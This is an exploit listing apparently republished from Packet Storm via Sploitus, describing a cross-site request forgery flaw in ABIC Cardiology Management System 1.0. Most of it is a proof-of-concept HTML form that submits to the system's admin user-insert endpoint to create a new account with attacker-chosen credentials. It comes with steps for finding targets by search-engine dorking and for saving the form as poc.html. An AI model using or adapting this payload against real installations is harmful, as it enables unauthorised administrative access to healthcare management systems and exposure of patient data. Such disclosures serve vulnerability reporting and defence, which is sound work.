ABIC Cardiology Management System 1.0 Cross Site Request Forgery exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:180248 ============================================================================================================================================= | # Title : ABIC cardiology Management System 1.0 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) | | # Vendor : https://abicegypt.com/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] Line 7 : Set your target url [+] save payload as poc.html [+] payload : <div class="panel panel-default panel-table"> <div class="panel-heading"> <h2 class="text-center">New User </h2> </div> <div class="panel-body"> <div class="col-md-offset-2 col-md-8"> <form action="https://127.0.0.1.com/eg-admin/users/insert.php?" method="post" enctype="multipart/form-data" name="form1" id="form1"> <div class="form-group"> User Name <input type="text" name="username" class="form-control" placeholder="Insert User Name"> </div> <div class="form-group"> Password <input type="text" name="password" class="form-control" placeholder="Insert Password"> </div> <div class="col-xs-12"> <button type="submit" class="btn btn-primary btn-xl" name="add"> SAVE </button> </div> <input type="hidden" name="MM_insert" value="form1"> </form> </div> </div> </div> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================